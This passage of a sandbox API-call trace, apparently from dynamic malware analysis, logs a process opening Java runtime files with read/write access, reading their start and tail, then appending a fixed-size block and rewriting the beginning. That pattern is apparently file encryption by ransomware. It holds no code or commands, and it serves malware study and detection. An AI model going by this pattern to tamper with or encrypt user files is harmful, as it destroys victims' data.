(hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.885] ReleaseMutex (hMutex=0x168) returned 1 [0114.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jabswitch.exe", lpUsedDefaultChar=0x0) returned 13 [0114.885] ReadFile (in: hFile=0x208, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0114.888] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xaba8 [0114.888] ReadFile (in: hFile=0x208, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.889] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xaba8 [0114.889] WriteFile (in: hFile=0x208, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.890] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0114.890] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0114.890] CloseHandle (hObject=0x208) returned 1 [0114.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.893] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.893] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3da8 [0114.893] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.893] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.893] ReleaseMutex (hMutex=0x168) returned 1 [0114.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keytool.exe", lpUsedDefaultChar=0x0) returned 11 [0114.894] ReadFile (in: hFile=0x208, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.900] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2da8 [0114.900] ReadFile (in: hFile=0x208, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.941] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2da8 [0114.941] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.942] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0114.942] WriteFile (in: hFile=0x208, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.942] CloseHandle (hObject=0x208) returned 1 [0114.943] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3da8 [0114.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.963] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.963] ReleaseMutex (hMutex=0x168) returned 1 [0114.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmiregistry.exe", cchWideChar=15, lpMultiByteStr=0x1f7328c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmiregistry.exe", lpUsedDefaultChar=0x0) returned 15 [0114.963] ReadFile (in: hFile=0x208, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.988] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2da8 [0114.988] ReadFile (in: hFile=0x208, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.020] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2da8 [0115.021] WriteFile (in: hFile=0x208, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.022] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0115.022] WriteFile (in: hFile=0x208, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.022] CloseHandle (hObject=0x208) returned 1 [0115.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0115.023] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0115.023] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4d0 [0115.023] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0115.023] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.023] ReleaseMutex (hMutex=0x168) returned 1 [0115.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="calendars.properties", lpUsedDefaultChar=0x0) returned 20 [0115.023] ReadFile (in: hFile=0x208, lpBuffer=0x28bdbe8, nNumberOfBytesToRead=0x4d0, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28bdbe8*, lpNumberOfBytesRead=0x345f2bc*=0x4d0, lpOverlapped=0x0) returned 1 [0116.504] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0116.504] WriteFile (in: hFile=0x208, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa58, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0xa58, lpOverlapped=0x0) returned 1 [0116.504] CloseHandle (hObject=0x208) returned 1 [0116.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0116.505] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.505] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x15ac [0116.506] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.506] ReleaseMutex (hMutex=0x168) returned 1 [0116.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x1f8fedc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="content-types.properties", lpUsedDefaultChar=0x0) returned 24 [0116.506] ReadFile (in: hFile=0x208, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x15ac, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x345f2bc*=0x15ac, lpOverlapped=0x0) returned 1 [0116.617] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0116.617] WriteFile (in: hFile=0x208, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1b34, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f2d0*=0x1b34, lpOverlapped=0x0) returned 1 [0116.617] CloseHandle (hObject=0x208) returned 1 [0116.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0116.618] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.618] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xc97 [0116.619] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.619] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.619] ReleaseMutex (hMutex=0x168) returned 1 [0116.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0116.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_it.properties", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_it.properties", lpUsedDefaultChar=0x0) returned 22 [0116.619] ReadFile (in: hFile=0x208, lpBuffer=0x2664868, nNumberOfBytesToRead=0xc97, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesRead=0x345f2bc*=0xc97, lpOverlapped=0x0) returned 1 [0116.633] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0116.633] WriteFile (in: hFile=0x208, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x121f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x345f2d0*=0x121f, lpOverlapped=0x0) returned 1 [0116.634] CloseHandle (hObject=0x208) returned 1 [0116.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.640] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.640] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3687 [0116.640] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.640] ReleaseMutex (hMutex=0x168) returned 1 [0116.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash.gif", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash.gif", lpUsedDefaultChar=0x0) returned 10 [0116.640] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.651] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2687 [0116.651] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.660] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2687 [0116.660] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.660] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0116.660] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.661] CloseHandle (hObject=0x1dc) returned 1 [0116.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3057d [0116.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.664] ReleaseMutex (hMutex=0x168) returned 1 [0116.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunjce_provider.jar", lpUsedDefaultChar=0x0) returned 19 [0116.664] ReadFile (in: hFile=0x1dc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.679] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2f57d [0116.679] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.684] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2f57d [0116.685] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.685] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0116.685] WriteFile (in: hFile=0x1dc, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.686] CloseHandle (hObject=0x1dc) returned 1 [0116.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x12574 [0116.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.690] ReleaseMutex (hMutex=0x168) returned 1 [0116.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0116.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x1f8fedc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiItalic.ttf", lpUsedDefaultChar=0x0) returned 26 [0116.690] ReadFile (in: hFile=0x1dc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0116.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11574 [0116.706] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ae18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.714] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11574 [0116.714] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.715] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0116.715] WriteFile (in: hFile=0x1dc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0116.715] CloseHandle (hObject=0x1dc) returned 1 [0116.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, 